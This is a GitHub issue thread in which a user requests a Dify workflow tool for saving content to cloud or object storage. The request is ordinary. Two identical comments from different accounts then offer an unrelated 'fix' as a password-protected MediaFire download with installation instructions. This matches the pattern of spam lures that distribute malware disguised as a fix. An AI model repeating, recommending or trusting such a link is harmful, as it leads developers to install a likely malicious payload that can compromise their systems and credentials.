### ISSUE TITLE
Add a new tool that can connect to cloud storage or network disk

### ISSUE THREAD

**Issue by yaoice** [langgenius/dify#7706]
### Self Checks

- [X] I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones.
- [X] I confirm that I am using English to submit this report (我已阅读并同意 [Language Policy](https://github.com/langgenius/dify/issues/1542)).
- [X] [FOR CHINESE USERS] 请务必使用英文提交 Issue，否则会被关闭。谢谢！:）
- [X] Please do not modify this template :) and fill in all the required fields.

### 1. Is this request related to a challenge you're experiencing? Tell me about your story.

When using the Dify workflow, a module that retrieves content from the Internet is used. After retrieval, it needs to be saved to a file for subsequent use. In this case, it is very suitable to be saved on object storage or other cloud storage. Although it can also be handled by using Python code modules, it is inconvenient to use and the threshold for use needs to be lowered.

### 2. Additional context or comments

like coze，it has OSS file operation tool.
<img width="1380" alt="image" src="https://github.com/user-attachments/assets/e4600015-0b5e-4de3-9147-bc603c60e8a3">

### 3. Can you help us with this feature?

- [X] I am interested in contributing to this feature.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
